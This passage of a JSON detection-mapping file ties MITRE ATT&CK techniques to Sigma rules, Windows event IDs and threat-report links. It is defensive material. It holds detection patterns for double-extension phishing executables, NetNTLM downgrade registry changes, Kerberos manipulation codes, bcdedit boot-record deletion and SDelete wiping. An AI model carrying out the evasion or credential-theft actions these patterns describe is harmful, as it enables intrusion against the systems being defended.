"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://securelist.com/operation-daybreak/75100/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", NaN + ] + }, + { + "technique_id": "T1193", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "status": "experimental", + "references": [ + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://blog.alyac.co.kr/1901", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.initial_access", + "attack.t1059", + "attack.t1202", + "attack.t1193", + "attack.g0032" + ], + "author": "Florian Roth", + "date": "2019/10/24", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\Hwp.exe", + "Image": "*\\gbb.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Double 
Extension", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "references": [ + "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792" + ], + "author": "Florian Roth (rule), @blu3_team (idea)", + "date": "2019/06/26", + "tags": [ + "attack.initial_access", + "attack.t1193" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*.doc.exe", + "*.docx.exe", + "*.xls.exe", + "*.xlsx.exe", + "*.ppt.exe", + "*.pptx.exe", + "*.rtf.exe", + "*.pdf.exe", + "*.txt.exe", + "* .exe", + "*______.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "status": "experimental", + "description": "Detects a suspicious program execution in Outlook temp folder", + "author": "Florian Roth", + "date": "2019/10/01", + "tags": [ + "attack.initial_access", + "attack.t1193" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\Temporary Internet Files\\Content.Outlook\\\\*" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Packet capture" + ], + [ + "Mail server" + ], + [ + "Network intrusion detection system" + ], + [ + "Detonation chamber" + ], + [ + "Email gateway" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Packet capture" + ], + [ + "Mail server" + 
], + [ + "Network intrusion detection system" + ], + [ + "Detonation chamber" + ], + [ + "Email gateway" + ] + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.justice.gov/file/1080281/download", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/", 
+ "https://www.riskiq.com/blog/labs/cobalt-strike/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.justice.gov/opa/press-release/file/1084361/download", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.group-ib.com/blog/cobalt", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + 
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + ] + }, + { + "technique_id": "T1212", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "action": "global", + "title": "NetNTLM Downgrade Attack", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "description": "Detects post exploitation using NetNTLM downgrade attacks", + "references": [ + 
"https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks" + ], + "author": "Florian Roth", + "date": "2018/03/20", + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "detection": { + "condition": "1 of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection1": { + "EventID": 13, + "TargetObject": [ + "*SYSTEM\\\\*ControlSet*\\Control\\Lsa\\lmcompatibilitylevel", + "*SYSTEM\\\\*ControlSet*\\Control\\Lsa\\NtlmMinClientSec", + "*SYSTEM\\\\*ControlSet*\\Control\\Lsa\\RestrictSendingNTLMTraffic" + ] + } + } + }, + { + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Object Access > Audit Registry (Success)" + }, + "detection": { + "selection2": { + "EventID": 4657, + "ObjectName": "\\REGISTRY\\MACHINE\\SYSTEM\\\\*ControlSet*\\Control\\Lsa", + "ObjectValueName": [ + "LmCompatibilityLevel", + "NtlmMinClientSec", + "RestrictSendingNTLMTraffic" + ] + } + } + }, + { + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth", + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 675, + 4768, + 4769, + 4771 + ], + "FailureCode": [ + "0x9", + "0xA", + "0xB", + "0xF", + "0x10", + "0x11", + "0x13", + "0x14", + "0x1A", + "0x1F", + "0x21", + "0x22", + "0x23", + "0x24", + "0x26", + "0x27", + "0x28", + "0x29", + "0x2C", + "0x2D", + "0x2E", + "0x2F", + "0x31", + "0x32", + "0x3E", + "0x3F", + "0x40", + "0x41", + "0x43", + "0x44" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Faulty legacy applications" + ], + "level": "high" + }, + { + "title": "Possible 
Remote Password Change Through SAMR", + "id": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", + "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). \"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.", + "author": "Dimitrios Slamaris", + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "samrpipe": { + "EventID": 5145, + "RelativeTargetName": "samr" + }, + "passwordchanged": { + "EventID": 4738 + }, + "passwordchanged_filter": { + "PasswordLastSet": null + }, + "timeframe": "15s", + "condition": "( passwordchanged and not passwordchanged_filter ) | near samrpipe" + }, + "level": "medium" + }, + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1067", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Possible Ransomware or unauthorized MBR modifications", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "experimental", + "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", + "references": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set" + ], + "author": "@neu5ron", + "date": "2019/02/07", + "tags": [ + "attack.defense_evasion", 
+ "attack.t1070", + "attack.persistence", + "attack.t1067" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "NewProcessName": "*\\bcdedit.exe", + "ProcessCommandLine": [ + "*delete*", + "*deletevalue*", + "*import*" + ] + }, + "condition": "selection" + }, + "level": "medium" + }, + [ + "API monitoring" + ], + [ + "MBR" + ], + [ + "VBR" + ], + [ + "API monitoring" + ], + [ + "MBR" + ], + [ + "VBR" + ] + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ] + }, + { + "technique_id": "T1500", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. 
AppData)", + "status": "experimental", + "references": [ + "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/" + ], + "author": "Florian Roth", + "date": "2019/08/24", + "modified": "2019/08/31", + "tags": [ + "attack.defense_evasion", + "attack.t1500" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\csc.exe", + "CommandLine": [ + "*\\AppData\\\\*", + "*\\Windows\\Temp\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unkown" + ], + "level": "high" + } + ], + "external_reference": [ + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf" + ] + }, + { + "technique_id": "T1066", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "status": "experimental", + "description": "Detects renaming of file while deletion with SDelete tool", + "author": "Thomas Patzke", + "references": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1107", + "attack.t1066", + "attack.s0195" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 4656, + 4663, + 4658 + ], + "ObjectName": [ + "*.AAA", + "*.ZZZ" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitime usage of SDelete" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + 
"5156", + "Windows Firewall" + ], + [ + "Anti-virus" + ], + [ + "B9", + "Binary file metadata" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "Anti-virus" + ] + ], + "external_reference": [ + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf" + ] + }, + { + "technique_id": "T1200", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "USB Device Plugged", + "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", + "description": "Detects plugged USB devices", + "references": [ + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", + "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/" + ], + "status": "experimental", + "author": "Florian Roth", + "tags": [ + "attack.initial_access", + "attack.t1200" + ], + "logsource": { + "product": "windows", + "service": "driver-framework" + }, + "detection": { + "selection": { + "EventID": [ + 2003, + 2100, + 2102 + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "low" + }, + [ + "Asset Management" + ], + [ + "Data loss prevention" + ], + [ + "Asset Management" + ], + [ + "Data loss prevention" + ], + { + 
"data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1025", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "5140/5145", + "Net Shares" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1185", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "Packet capture" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "Packet capture" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + 
"Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1092", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + 
"possible_detections": [ + [ + "4657", + "Registry Monitoring ", + "USB Keys" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + [ + "4657", + "Registry Monitoring ", + "USB Keys" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive creation", + "description": "A drive was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "drive" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1094", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + 
"https://pan-unit42.github.io/playbook_viewer/", + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1024", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Malware reverse engineering" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Malware reverse engineering" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ] + }, + { + "technique_id": "T1132", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Network protocol analysis" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or 
captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
